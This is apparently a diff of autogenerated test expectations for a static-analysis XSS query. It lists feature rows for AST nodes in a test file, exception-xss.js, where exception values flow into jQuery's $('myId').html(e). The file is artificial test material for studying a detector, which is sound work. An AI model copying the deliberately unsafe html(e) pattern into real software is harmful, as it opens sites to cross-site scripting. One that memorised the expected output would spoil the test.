autogenerated/Xss/ExceptionXss/exception-xss.js:29:13:29:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:18:29:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:18:29:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:18:29:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18876,6 +128144,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:29:18:29:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:18:29:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:18:29:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | exceptional return of unknown ... , foo]) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | exceptional return of unknown ... , foo]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | exceptional return of unknown ... , foo]) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | exceptional return of unknown ... , foo]) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | exceptional return of unknown ... , foo]) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | unknown ... , foo]) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | unknown ... , foo]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | unknown ... , foo]) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | unknown ... , foo]) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:3:33:23 | unknown ... , foo]) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:11:33:22 | ["bar", foo] | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:11:33:22 | ["bar", foo] | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:11:33:22 | ["bar", foo] | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18884,15 +128167,65 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:33:11:33:22 | ["bar", foo] | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:11:33:22 | ["bar", foo] | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:12:33:16 | "bar" | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | contextSurroundingFunctionParameters | () | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:33:19:33:21 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:34:11:34:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:3:35:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:5:35:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:5:35:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:5:35:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18900,6 +128233,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:35:5:35:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:5:35:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:5:35:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:13:35:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:13:35:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:13:35:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:13:35:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:35:13:35:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:18:35:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:18:35:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:18:35:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18907,6 +128245,227 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:35:18:35:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:18:35:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:35:18:35:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | this | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:38:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | 'arguments' object of function deep | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | 'arguments' object of function deep | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | 'arguments' object of function deep | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | 'arguments' object of function deep | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | 'arguments' object of function deep | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | exceptional return of function deep | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | exceptional return of function deep | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | exceptional return of function deep | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | exceptional return of function deep | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | exceptional return of function deep | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | functio ... (x);\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | functio ... (x);\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | functio ... (x);\\n\\t} | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | functio ... (x);\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | functio ... (x);\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | return of function deep | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | return of function deep | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:38:2:40:2 | return of function deep | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| 